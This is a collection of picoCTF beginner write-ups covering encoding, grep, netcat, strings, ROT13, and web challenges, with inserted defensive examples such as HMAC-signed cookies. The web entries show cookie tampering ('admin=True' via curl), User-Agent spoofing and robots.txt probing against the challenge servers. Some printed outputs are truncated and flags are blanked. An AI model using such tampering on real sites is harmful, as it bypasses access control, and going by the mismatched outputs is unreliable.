This is [Base64 encoding](https://en.wikipedia.org/wiki/Base64) and there are several ways to decode it.

### CyberChef solution

We can use [CyberChef](https://gchq.github.io/CyberChef/) and the `Base64` recipe to decode it.
Type 'base64' in the `Operations` search bar, then drag and drop `From Base64` to the `Recipe` pane.
Then copy and paste `bDNhcm5fdGgzX3IwcDM1` to the `Input` pane.
Finally, press `BAKE` if you don't have `Auto Bake` selected already.
The result is shown in the `Output` pane.

To get the full flag you need to add the 'picoCTF{' and '}' parts as instructed in the hint.

### Use the base64 commandline tool

Alternatively, you can use the `base64` tool like this
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/General_Skills/Bases]
└─$ echo 'bDNhcm5fdGgzX3IwcDM1' | base64 -d
l3arn_
```

Again, you need to add the 'picoCTF{' and '}' parts to get the full flag.

### Write a Python script

Of course, you can always write a Python script to decode it
```python
#!/usr/bin/env python3

from base64 import b64decode

enc = 'bDNhcm5fdGgzX3IwcDM1'

# b64decode returns bytes; decode() turns them into a str
decoded = b64decode(enc).decode()
print(f"picoCTF{{{decoded}}}")
```

Then we make sure the script is executable and run it to get the flag
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/General_Skills/Bases]
└─$ chmod +x decode.py

┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/General_Skills/Bases]
└─$ ./decode.py
picoCTF{}
```

For additional information, please see the references below.

## References

- [Wikipedia - Base64](https://en.wikipedia.org/wiki/Base64)

--------------------------------------------------------------------------------
/picoCTF_2019/General_Skills/First_Grep.md:
--------------------------------------------------------------------------------
# First Grep

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 100
Tags: picoCTF 2019, General Skills
Author: ALEX FULTON/DANNY TUNITIS

Description:
Can you find the flag in file?

This would be really tedious to look through manually, something tells me there is a better way.

Hints:
1. grep tutorial
```
Challenge link: [https://play.picoctf.org/practice/challenge/85](https://play.picoctf.org/practice/challenge/85)

## Solution

This is basically a very easy tutorial for `grep`
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/General_Skills/First_Grep]
└─$ grep picoCTF file
picoCTF{}
```

For additional information, please see the references below.

## References

- [grep - Linux manual page](https://man7.org/linux/man-pages/man1/grep.1.html)
- [Grep and Regular Expressions!](https://ryanstutorials.net/linuxtutorial/grep.php)

--------------------------------------------------------------------------------
/picoCTF_2019/General_Skills/Lets_Warm_Up.md:
--------------------------------------------------------------------------------
# Lets Warm Up

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 50
Tags: picoCTF 2019, General Skills
Author: SANJAY C/DANNY TUNITIS

Description:
If I told you a word started with 0x70 in hexadecimal, what would it start with in ASCII?

Hints:
1. Submit your answer in our flag format. For example, if your answer was 'hello',
you would submit 'picoCTF{hello}' as the flag.
```
Challenge link: [https://play.picoctf.org/practice/challenge/22](https://play.picoctf.org/practice/challenge/22)

## Solution

We can either manually look up the answer in an [ASCII table](https://www.ascii-code.com/) or use an interactive Python session to do the work for us with the [chr function](https://docs.python.org/3/library/functions.html#chr)
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/General_Skills/Lets_Warm_Up]
└─$ python
Python 3.11.4 (main, Jun 7 2023, 10:13:09) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> print('picoCTF{' + chr(0x70) + '}')
picoCTF{p}
>>> exit()
```

For additional information, please see the references below.

## References

- [Wikipedia - ASCII](https://en.wikipedia.org/wiki/ASCII)
- [ASCII Table](https://www.ascii-code.com/)

--------------------------------------------------------------------------------
/picoCTF_2019/General_Skills/README.md:
--------------------------------------------------------------------------------
# General Skills Challenges

12 Challenges:
- [1_wanna_b3_a_r0ck5tar](1_wanna_b3_a_r0ck5tar.md)
- [2Warm](2Warm.md)
- [Based](Based.md)
- [Bases](Bases.md)
- [First Grep](First_Grep.md)
- [flag_shop](flag_shop.md)
- [Lets Warm Up](Lets_Warm_Up.md)
- [mus1c](mus1c.md)
- [plumbing](plumbing.md)
- [strings it](strings_it.md)
- [Warmed Up](Warmed_Up.md)
- [what's a net cat?](whats_a_net_cat.md)

--------------------------------------------------------------------------------
/picoCTF_2019/General_Skills/Warmed_Up.md:
--------------------------------------------------------------------------------
# Warmed Up

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 50
Tags: picoCTF 2019, General Skills
Author: SANJAY C/DANNY TUNITIS

Description:
What is 0x3D (base 16) in decimal (base 10)?

Hints:
1. Submit your answer in our flag format. For example, if your answer was '22',
you would submit 'picoCTF{22}' as the flag.
```
Challenge link: [https://play.picoctf.org/practice/challenge/58](https://play.picoctf.org/practice/challenge/58)

## Solution

### Convert in Python

We can use an interactive Python session to do the work for us with the [str function](https://docs.python.org/3/library/functions.html#func-str) and the fact that Python understands [hexadecimal numbers](https://en.wikipedia.org/wiki/Hexadecimal)
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/General_Skills/Warmed_Up]
└─$ python
Python 3.11.4 (main, Jun 7 2023, 10:13:09) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> print('picoCTF{' + str(0x3d) + '}')
picoCTF{61}
>>> exit()
```

### Convert with bc

Alternatively, we can use the tool `bc` to do the conversion. Install it with `sudo apt install bc` if it isn't installed already.
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/General_Skills/Warmed_Up]
└─$ echo "ibase=16; 3D" | bc
61
```
In this case you need to construct the complete flag manually.

### Convert directly in bash

Finally, we can convert directly in bash
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/General_Skills/Warmed_Up]
└─$ echo $((16#3d))
61
```
As before, you need to construct the complete flag manually in this case.

For additional information, please see the references below.

## References

- [Wikipedia - Hexadecimal](https://en.wikipedia.org/wiki/Hexadecimal)

--------------------------------------------------------------------------------
/picoCTF_2019/General_Skills/plumbing.md:
--------------------------------------------------------------------------------
# plumbing

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 200
Tags: picoCTF 2019, General Skills
Author: ALEX FULTON/DANNY TUNITIS

Description:
Sometimes you need to handle process data outside of a file.

Can you find a way to keep the output from this program and search for the flag?

Connect to jupiter.challenges.picoctf.org 7480.

Hints:
1. Remember the flag format is picoCTF{XXXX}
2. What's a pipe? No not that kind of pipe... This kind
```
Challenge link: [https://play.picoctf.org/practice/challenge/48](https://play.picoctf.org/practice/challenge/48)

## Solution

Let's connect to the server with `nc` and see what we get
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/General_Skills/Plumbing]
└─$ nc jupiter.challenges.picoctf.org 7480
Not a flag either
Again, I really don't think this is a flag
I don't think this is a flag either
This is defintely not a flag
Again, I really don't think this is a flag
Not a flag either
I don't think this is a flag either
Again, I really don't think this is a flag
Again, I really don't think this is a flag
This is defintely not a flag
This is defintely not a flag
This is defintely not a flag
This is defintely not a flag
Not a flag either
Again, I really don't think this is a flag
Not a flag either
<---snip--->
```

OK, too much output.
Let's `grep` for the flag
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/General_Skills/Plumbing]
└─$ nc jupiter.challenges.picoctf.org 7480 | grep picoCTF
picoCTF{}
```

And there we have the flag.

For additional information, please see the references below.

## References

- [Pipes: A Brief Introduction](http://www.linfo.org/pipes.html)
- [grep(1) - Linux man page](https://linux.die.net/man/1/grep)
- [nc(1) - Linux man page](https://linux.die.net/man/1/nc)

--------------------------------------------------------------------------------
/picoCTF_2019/General_Skills/strings_it.md:
--------------------------------------------------------------------------------
# strings it

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 100
Tags: picoCTF 2019, General Skills
Author: SANJAY C/DANNY TUNITIS

Description:
Can you find the flag in file without running it?

Hints:
1. strings
```
Challenge link: [https://play.picoctf.org/practice/challenge/37](https://play.picoctf.org/practice/challenge/37)

## Solution

This is basically a tutorial on the usage of `strings` and `grep`
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/General_Skills/Strings_it]
└─$ strings -n 8 strings | grep picoCTF
picoCTF{}
```

For additional information, please see the references below.
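What `strings -n 8 | grep` computes, as an added example that is not taken from the writeup: `extract_strings` finds runs of printable ASCII of at least `min_len` bytes, which is the default definition `strings(1)` uses (and `-n` changes the minimum), and `grep_strings` filters those runs for a pattern, all without executing anything. The binary blob and the flag inside it are constructed so the example runs offline; the function names are mine.

```python
import re


def extract_strings(data: bytes, min_len: int = 4) -> list[str]:
    """Runs of at least `min_len` printable ASCII bytes (0x20 space to 0x7e
    tilde), the same notion of a 'string' as strings(1) with -n min_len."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.decode("ascii") for m in pattern.findall(data)]


def grep_strings(data: bytes, needle: str, min_len: int = 8) -> list[str]:
    """strings -n min_len | grep needle, as one function."""
    return [s for s in extract_strings(data, min_len) if needle in s]


def sample_binary() -> bytes:
    """Constructed stand-in for the challenge binary: an ELF-like prefix,
    an interpreter path, a few short runs, a constructed flag and padding."""
    return (
        b"\x7fELF\x02\x01\x01" + b"\x00" * 9
        + b"/lib64/ld-linux-x86-64.so.2\x00"
        + b"\x01\x02\x03" + b"Hi!\x00" + b"main\x00" + b"\xff" * 4
        + b"picoCTF{constructed_flag}\x00"
        + b"\x90" * 16
    )


if __name__ == "__main__":
    blob = sample_binary()
    print(extract_strings(blob, 4))
    print(grep_strings(blob, "picoCTF"))
```

Raising the minimum length from the default 4 to 8 is what drops noise such as `main` and three-byte fragments like `ELF`, while anything as long as a flag or a library path survives.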

## References

- [grep - Linux manual page](https://man7.org/linux/man-pages/man1/grep.1.html)
- [strings - Linux manual page](https://man7.org/linux/man-pages/man1/strings.1.html)
-------------------------------------------------------------------------------- /picoCTF_2019/General_Skills/whats_a_net_cat.md: --------------------------------------------------------------------------------
# what's a net cat?

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 100
Tags: picoCTF 2019, General Skills
Author: SANJAY C/DANNY TUNITIS

Description:
Using netcat (nc) is going to be pretty important.

Can you connect to jupiter.challenges.picoctf.org at port 64287 to get the flag?

Hints:
1. nc tutorial
```
Challenge link: [https://play.picoctf.org/practice/challenge/34](https://play.picoctf.org/practice/challenge/34)

## Solution

This is basically a tutorial in the basic usage of `nc`
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/General_Skills/What's_a_net_cat]
└─$ nc jupiter.challenges.picoctf.org 64287
You're on your way to becoming the net cat master
picoCTF{}
```

For additional information, please see the references below.

## References

- [nc(1) - Linux man page](https://linux.die.net/man/1/nc)
-------------------------------------------------------------------------------- /picoCTF_2019/Reverse_Engineering/Droids0_Emulation.png: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2019/Reverse_Engineering/Droids0_Emulation.png
-------------------------------------------------------------------------------- /picoCTF_2019/Reverse_Engineering/README.md: --------------------------------------------------------------------------------
# Reverse Engineering Challenges

12 Challenges:
- [asm1](asm1.md)
- [asm2](asm2.md)
- [asm3](asm3.md)
- [droids0](droids0.md)
- [droids1](droids1.md)
- [reverse_cipher](reverse_cipher.md)
- [vault-door-1](vault-door-1.md)
- [vault-door-3](vault-door-3.md)
- [vault-door-4](vault-door-4.md)
- [vault-door-5](vault-door-5.md)
- [vault-door-6](vault-door-6.md)
- [vault-door-training](vault-door-training.md)
-------------------------------------------------------------------------------- /picoCTF_2019/Reverse_Engineering/vault-door-training.md: --------------------------------------------------------------------------------
# vault-door-training

- [Challenge information](#challenge-information)
- [Solutions](#solutions)
- [References](#references)

## Challenge information
```
Points: 50
Tags: picoCTF 2019, Reverse Engineering
Author: MARK E. HAASE

Description:
Your mission is to enter Dr. Evil's laboratory and retrieve the blueprints for his Doomsday Project.
The laboratory is protected by a series of locked vault doors. Each door is controlled by a computer
and requires a password to open. Unfortunately, our undercover agents have not been able to obtain
the secret passwords for the vault doors, but one of our junior agents obtained the source code for
each vault's computer! You will need to read the source code for each level to figure out what the
password is for that vault door. As a warmup, we have created a replica vault in our training facility.

The source code for the training vault is here: VaultDoorTraining.java

Hints:
1. The password is revealed in the program's source code.
```
Challenge link: [https://play.picoctf.org/practice/challenge/7](https://play.picoctf.org/practice/challenge/7)

## Solutions

The source code looks like this
```java
import java.util.*;

class VaultDoorTraining {
    public static void main(String args[]) {
        VaultDoorTraining vaultDoor = new VaultDoorTraining();
        Scanner scanner = new Scanner(System.in);
        System.out.print("Enter vault password: ");
        String userInput = scanner.next();
        String input = userInput.substring("picoCTF{".length(),userInput.length()-1);
        if (vaultDoor.checkPassword(input)) {
            System.out.println("Access granted.");
        } else {
            System.out.println("Access denied!");
        }
    }

    // The password is below. Is it safe to put the password in the source code?
    // What if somebody stole our source code? Then they would know what our
    // password is. Hmm... I will think of some ways to improve the security
    // on the other doors.
    //
    // -Minion #9567
    public boolean checkPassword(String password) {
        return password.equals("w4rm1ng_Up_w1tH_jAv4_eec0716b713");
    }
}
```

We see that a [substring](https://www.javatpoint.com/java-string-substring) of `userInput` (the part between `picoCTF{` and the closing `}`) is extracted and then compared with [equals](https://www.javatpoint.com/java-string-equals) in the `checkPassword` method, where the inner part of the flag is visible in plain text.

For additional information, please see the references below.

## References

- [Java String substring()](https://www.javatpoint.com/java-string-substring)
- [Java String equals()](https://www.javatpoint.com/java-string-equals)
-------------------------------------------------------------------------------- /picoCTF_2019/Web_Exploitation/Network_conditions_tab_in_DevTools.png: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2019/Web_Exploitation/Network_conditions_tab_in_DevTools.png
-------------------------------------------------------------------------------- /picoCTF_2019/Web_Exploitation/README.md: --------------------------------------------------------------------------------
# Web Exploitation Challenges

8 Challenges:
- [Client-side-again](Client-side-again.md)
- [dont-use-client-side](dont-use-client-side.md)
- [Insp3ct0r](Insp3ct0r.md)
- [Irish-Name-Repo 1](Irish-Name-Repo_1.md)
- [Irish-Name-Repo 2](Irish-Name-Repo_2.md)
- [logon](logon.md)
- [picobrowser](picobrowser.md)
- [where are the robots](where_are_the_robots.md)
-------------------------------------------------------------------------------- /picoCTF_2019/Web_Exploitation/logon.md: --------------------------------------------------------------------------------
# logon

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 100
Tags: picoCTF 2019, Web Exploitation
Author: BOBSON

Description:
The factory is hiding things from all of its users. Can you login as Joe and find what they've been looking at?

https://jupiter.challenges.picoctf.org/problem/13594/ or http://jupiter.challenges.picoctf.org:13594

Hints:
1. Hmm it doesn't seem to check anyone's password, except for Joe's?
```
Challenge link: [https://play.picoctf.org/practice/challenge/46](https://play.picoctf.org/practice/challenge/46)

## Solution

The hint suggests that an authentication mechanism other than passwords is in use.

But let's browse to the web site and try to login with username `Joe` and password `Joe` anyway.
The message displayed is `I'm sorry Joe's password is super secure. You're not getting in that way.` which again tells us that this is not a question about finding Joe's password.

Let's try to login with username `admin` and password `admin` instead.
The message displayed now is `Success: You logged in! Not sure you'll be able to see the flag though`.

Let's check for authentication [cookies](https://en.wikipedia.org/wiki/HTTP_cookie).
Press F12 to open DevTools and go to the `Application` tab.
Under `Storage` and then `Cookies` select the web site.
Note that there are three cookies:
* A cookie named `admin` with the value `False`
* A cookie named `username` with the value `admin`
* A cookie named `password` with the value `admin`

Edit the `admin` cookie's value and set it to `True` and then reload the web page (press F5).
Now the web page displays the flag.
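The weakness here is that the server trusts an `admin` cookie the client can rewrite at will. The following is an added example, not part of this write-up or of the challenge, showing that pattern next to the usual fix: the server binds the cookie value to a secret key with an HMAC and refuses any value whose tag does not verify. The key and the cookie names are constructed for the demo; `sign_value` and `verify_value` are hypothetical helper names.

```python
"""Added example (not from the write-up): a cookie the client can edit versus a
cookie bound to a server-side key. Server key and cookie names are constructed."""
import hashlib
import hmac
import secrets

# Constructed server-side secret; a real server would load it from configuration.
SERVER_KEY = secrets.token_bytes(32)


def vulnerable_is_admin(cookies: dict) -> bool:
    """The pattern the challenge exposes: the server believes whatever the
    client sends in the `admin` cookie, so editing it in DevTools is enough."""
    return cookies.get("admin") == "True"


def sign_value(value: str, key: bytes = SERVER_KEY) -> str:
    """Return 'value.hexmac'; the MAC can only be produced with the server key."""
    mac = hmac.new(key, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}.{mac}"


def verify_value(cookie: str, key: bytes = SERVER_KEY):
    """Return the signed value if its MAC is valid, otherwise None."""
    value, sep, mac = cookie.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(key, value.encode(), hashlib.sha256).hexdigest()
    # compare_digest avoids leaking the MAC through timing differences
    if not hmac.compare_digest(mac, expected):
        return None
    return value


def hardened_is_admin(cookies: dict) -> bool:
    """Accept `admin=True` only when it carries a MAC made with the server key."""
    return verify_value(cookies.get("admin", "")) == "True"


def demo() -> dict:
    # What the server set after `admin`/`admin` logged in (constructed)
    issued = {"username": "admin", "admin": sign_value("False")}
    # The DevTools edit from the write-up: flip the value and drop the MAC ...
    tampered = dict(issued, admin="True")
    # ... or flip the value and keep the old MAC
    old_mac = issued["admin"].split(".")[1]
    tampered_keep_mac = dict(issued, admin="True." + old_mac)
    return {
        "vulnerable_tampered": vulnerable_is_admin(tampered),
        "hardened_honest": hardened_is_admin(issued),
        "hardened_tampered": hardened_is_admin(tampered),
        "hardened_tampered_keep_mac": hardened_is_admin(tampered_keep_mac),
        "hardened_real_admin": hardened_is_admin({"admin": sign_value("True")}),
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

Only the check on the server side changes; the client still sees and can edit the cookie, but an edited value no longer verifies. The same reasoning applies to the `password` cookie above: a client-held copy of the password is never something the server should read back and trust.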

If you want to automate the retrieval of the flag you can use `curl` like this
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Web_Exploitation/Logon]
└─$ curl -s -L --cookie admin=True http://jupiter.challenges.picoctf.org:13594/flag | grep -oE 'picoCTF{.*}'
picoCTF{}
```

For additional information, please see the references below.

## References

- [Wikipedia - HTTP cookie](https://en.wikipedia.org/wiki/HTTP_cookie)
- [curl - Linux manual page](https://man7.org/linux/man-pages/man1/curl.1.html)
- [grep - Linux manual page](https://man7.org/linux/man-pages/man1/grep.1.html)
-------------------------------------------------------------------------------- /picoCTF_2019/Web_Exploitation/picobrowser.md: --------------------------------------------------------------------------------
# picobrowser

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 200
Tags: picoCTF 2019, Web Exploitation
Author: ARCHIT

Description:
This website can be rendered only by picobrowser, go and catch the flag!

https://jupiter.challenges.picoctf.org/problem/26704/ or http://jupiter.challenges.picoctf.org:26704

Hints:
1. You don't need to download a new web browser
```
Challenge link: [https://play.picoctf.org/practice/challenge/9](https://play.picoctf.org/practice/challenge/9)

## Solution

Browsing to the website you see a big `Flag` button that sends you to `/flag` and displays the message `You're not picobrowser!`.
We have the wrong [user-agent header](https://en.wikipedia.org/wiki/User-Agent_header).

### Curl solution

The user-agent is most easily changed with `curl`.
Then we can just `grep` for the flag
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Web_Exploitation/Picobrowser]
└─$ curl -s -A picobrowser http://jupiter.challenges.picoctf.org:26704/flag | grep -oE 'picoCTF{.*}'
picoCTF{}
```

### DevTools solution

An alternative solution is to use your browser's DevTools.

Press F12 to open DevTools and then click on the three-dots button in the upper right corner of DevTools.
Select `More Tools` in the pop-up menu and then select `Network conditions`.
A new section with the `Network conditions` tab selected opens up in the lower part of DevTools.
In the `User agent` part, deselect the `Use browser default` checkbox. Enter `picobrowser` in the textbox.

![Network conditions tab in DevTools](Network_conditions_tab_in_DevTools.png)

Reload the web page by pressing `F5` and the flag is shown.

For additional information, please see the references below.

## References

- [curl - Linux manual page](https://man7.org/linux/man-pages/man1/curl.1.html)
- [grep - Linux manual page](https://man7.org/linux/man-pages/man1/grep.1.html)
- [Wikipedia - User-Agent header](https://en.wikipedia.org/wiki/User-Agent_header)
-------------------------------------------------------------------------------- /picoCTF_2019/Web_Exploitation/where_are_the_robots.md: --------------------------------------------------------------------------------
# where are the robots

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 100
Tags: picoCTF 2019, Web Exploitation
Author: ZARATEC/DANNY

Description:
Can you find the robots?
https://jupiter.challenges.picoctf.org/problem/36474/ or http://jupiter.challenges.picoctf.org:36474

Hints:
1. What part of the website could tell you where the creator doesn't want you to look?
```
Challenge link: [https://play.picoctf.org/practice/challenge/4](https://play.picoctf.org/practice/challenge/4)

## Solution

The name of the challenge and the hint suggest that we should check the [robots.txt](https://en.wikipedia.org/wiki/Robots.txt) file.

We can use `curl` for this
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Web_Exploitation/Where_are_the_robots]
└─$ curl http://jupiter.challenges.picoctf.org:36474/robots.txt
User-agent: *
Disallow: /477ce.html
```

Ah, a web page that the site owner doesn't want search engines to include.

Let's retrieve it in silent mode (-s) and `grep` for the flag
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Web_Exploitation/Where_are_the_robots]
└─$ curl -s http://jupiter.challenges.picoctf.org:36474/477ce.html | grep -oE 'picoCTF{.*}'
picoCTF{}
```

And there we have the flag.

For additional information, please see the references below.
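The point of this challenge is that `robots.txt` is a public file: every path it lists is disclosed to anyone who reads it, and crawlers are only asked, not forced, to stay away. As an added example (not part of this write-up), here is a small parser for the format that collects the `Disallow` paths per `User-agent` group, so a site owner can see exactly what the file reveals. The sample file is constructed; the challenge's real file has only the two lines shown above.

```python
"""Added example (not from the write-up): parse robots.txt and list what it
discloses. SAMPLE_ROBOTS_TXT is constructed for the demo."""
from typing import Dict, List

SAMPLE_ROBOTS_TXT = """\
# constructed sample, not the challenge's real file
User-agent: *
Disallow: /secret-area/
Disallow: /backup.zip

User-agent: Googlebot
User-agent: Bingbot
Allow: /public/
Disallow: /
"""


def parse_robots(text: str) -> Dict[str, List[str]]:
    """Map each user agent to the paths it is asked not to crawl.

    A group is one or more consecutive User-agent lines followed by rules;
    each rule applies to every agent named in that group. '#' starts a comment.
    """
    rules: Dict[str, List[str]] = {}
    current: List[str] = []        # agents of the group being read
    reading_agents = True          # True while consecutive User-agent lines arrive
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        field, value = (part.strip() for part in line.split(":", 1))
        field = field.lower()
        if field == "user-agent":
            if not reading_agents:   # rules were seen, so this starts a new group
                current = []
                reading_agents = True
            current.append(value)
            rules.setdefault(value, [])
        elif field in ("disallow", "allow"):
            reading_agents = False
            if field == "disallow" and value:   # an empty Disallow allows everything
                for agent in current:
                    rules[agent].append(value)
    return rules


def disclosed_paths(text: str) -> List[str]:
    """Every path the file points a reader at, across all agent groups."""
    seen: List[str] = []
    for paths in parse_robots(text).values():
        for path in paths:
            if path not in seen:
                seen.append(path)
    return seen


if __name__ == "__main__":
    for agent, paths in parse_robots(SAMPLE_ROBOTS_TXT).items():
        print(f"{agent}: {paths}")
    print("paths disclosed to any reader:", disclosed_paths(SAMPLE_ROBOTS_TXT))
```

Run against the challenge's two-line file the parser returns `{"*": ["/477ce.html"]}`, which is exactly the information the write-up used. Anything that must stay private needs authentication on the server, not an entry in `robots.txt`.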

## References

- [curl - Linux manual page](https://man7.org/linux/man-pages/man1/curl.1.html)
- [grep - Linux manual page](https://man7.org/linux/man-pages/man1/grep.1.html)
- [Wikipedia - robots.txt](https://en.wikipedia.org/wiki/Robots.txt)
-------------------------------------------------------------------------------- /picoCTF_2020/README.md: --------------------------------------------------------------------------------
# picoCTF 2020 Mini-Competition

## Forensics Challenges

1 Challenge:
- [Pitter, Patter, Platters](Forensics/Pitter_Patter_Platters.md)

## Web Exploitation Challenges

1 Challenge:
- [Web Gauntlet](Web_Exploitation/Web_Gauntlet.md)
-------------------------------------------------------------------------------- /picoCTF_2021/Binary_Exploitation/README.md: --------------------------------------------------------------------------------
# Binary Exploitation Challenges

2 Challenges:
- [Here's a LIBC](Heres_a_LIBC.md)
- [Stonks](Stonks.md)
-------------------------------------------------------------------------------- /picoCTF_2021/Cryptography/Mod_26.md: --------------------------------------------------------------------------------
# Mod 26

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 10
Tags: picoCTF 2021, Cryptography
Author: PANDU

Description:
Cryptography can be easy, do you know what ROT13 is?

cvpbPGS{arkg_gvzr_V'yy_gel_2_ebhaqf_bs_ebg13_GYpXOHqX}

Hints:
1. This can be solved online if you don't want to do it by hand!
```
Challenge link: [https://play.picoctf.org/practice/challenge/144](https://play.picoctf.org/practice/challenge/144)

## Solution

There are several ways to solve this challenge and here are some of them.

### CyberChef solution

As the hint suggested you can use an online site such as [CyberChef](https://gchq.github.io/CyberChef/) and use the 'ROT13' recipe.

Enter 'rot13' in the `Operations` search bar, then drag and drop it to the `Recipe`.
Copy the scrambled flag to the `Input` pane and press `BAKE`.

### Use a rot13 commandline tool in Linux

There are at least two packages that contain a prepackaged `rot13` tool:
* [hxtools](https://manpages.debian.org/testing/hxtools/hxtools.7.en.html)
* [bsdgames](https://wiki.linuxquestions.org/wiki/BSD_games)

Install them with either `sudo apt install hxtools` or `sudo apt install bsdgames`.

The tool from `hxtools` installs as `/usr/bin/rot13` and is a script that invokes the `tr` command more or less as described below.

The tool from `bsdgames` installs as `/usr/games/rot13` and calls the `caesar` tool (which is also included in the package) but with a rotation of 13.

After one of these tools has been installed you can run
```bash
┌──(kali㉿kali)-[~]
└─$ echo "cvpbPGS{arkg_gvzr_V'yy_gel_2_ebhaqf_bs_ebg13_GYpXOHqX}" | rot13
picoCTF{next_time_}
```

### Use the tr tool in Linux

Alternatively, you can use the `tr` tool to "manually" do the decoding
```bash
┌──(kali㉿kali)-[~]
└─$ echo "cvpbPGS{arkg_gvzr_V'yy_gel_2_ebhaqf_bs_ebg13_GYpXOHqX}" | tr 'A-Za-z' 'N-ZA-Mn-za-m'
picoCTF{next_time_}
```

For additional information, please see the references below.

## References

- [Wikipedia - Modulo](https://en.wikipedia.org/wiki/Modulo)
- [Wikipedia - ROT13](https://en.wikipedia.org/wiki/ROT13)
-------------------------------------------------------------------------------- /picoCTF_2021/Cryptography/Pixelated.md: --------------------------------------------------------------------------------
# Pixelated

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 100
Tags: picoCTF 2021, Cryptography
Author: SARA

Description:
I have these 2 images, can you make a flag out of them?

scrambled1.png scrambled2.png

Hints:
1. https://en.wikipedia.org/wiki/Visual_cryptography
2. Think of different ways you can "stack" images
```
Challenge link: [https://play.picoctf.org/practice/challenge/100](https://play.picoctf.org/practice/challenge/100)

## Solution

There are several ways to solve this challenge and here are two of them.

### Stegsolve solution

You can use [StegSolve](https://github.com/Giotino/stegsolve) to combine the pictures. However, I never got the current 1.4 version to work and used the former [1.3 version](http://www.caesum.com/handbook/stego.htm) instead.

In StegSolve 1.3, open the `scrambled1.png` file. Then, in the `Analyse` menu select `Image Combiner` and select the `scrambled2.png` file. A new window opens where you can step through various ways to combine the images: XOR, OR, AND, ADD, SUB, etc.

You will find the flag with the `ADD` method.

### Write a Python script

An alternative way to solve this challenge is to write a Python script with the help of the [Python Imaging Library - Pillow](https://pypi.org/project/Pillow/) and [numpy](https://pypi.org/project/numpy/)
```python
#!/usr/bin/python

from PIL import Image
from numpy import array

image1 = Image.open('scrambled1.png')
image2 = Image.open('scrambled2.png')

# Convert to arrays
array1 = array(image1)
array2 = array(image2)

# Combine/add the images (element-wise; uint8 pixel values wrap around modulo 256)
result = array1 + array2

# Save the result
Image.fromarray(result).save('flag.png')
print("Result saved as flag.png")
```

Then we run the script to combine the images
```bash
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2021/Cryptography/Pixelated]
└─$ ~/python_venvs/Pillow/bin/python pixelaated.py
Result saved as flag.png
```

Finally, use `eog` or `feh` to view the `flag.png` image to get the flag.

For additional information, please see the references below.
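The two scrambled images are shares in the sense of the visual cryptography article the hint points at: each one alone is noise, and only stacking them reveals the secret. To make that construction concrete, the following is an added example (not from this write-up) that builds two such shares from a tiny one-bit bitmap and recombines them. It uses plain Python lists instead of numpy and Pillow so it runs without dependencies; the bitmap, the seed and the helper names are constructed for the demo.

```python
"""Added example (not from the write-up): build two visual-cryptography shares
and stack them again. A constructed 4x8 one-bit bitmap stands in for the images."""
import random
from typing import List, Optional, Tuple

Bitmap = List[List[int]]

# Constructed secret: 1 = dark pixel, 0 = light pixel (a crude letter "T")
SECRET: Bitmap = [
    [1, 1, 1, 1, 1, 1, 1, 1],
    [0, 0, 0, 1, 1, 0, 0, 0],
    [0, 0, 0, 1, 1, 0, 0, 0],
    [0, 0, 0, 1, 1, 0, 0, 0],
]


def make_shares(secret: Bitmap, seed: Optional[int] = None) -> Tuple[Bitmap, Bitmap]:
    """share1 is uniformly random; share2 = secret XOR share1.

    Each share on its own is a one-time-pad encryption of the secret, so it
    carries no information about it; only the pair does.
    """
    rng = random.Random(seed)   # seeded only so the demo is reproducible
    share1 = [[rng.randint(0, 1) for _ in row] for row in secret]
    share2 = [[s ^ r for s, r in zip(srow, rrow)] for srow, rrow in zip(secret, share1)]
    return share1, share2


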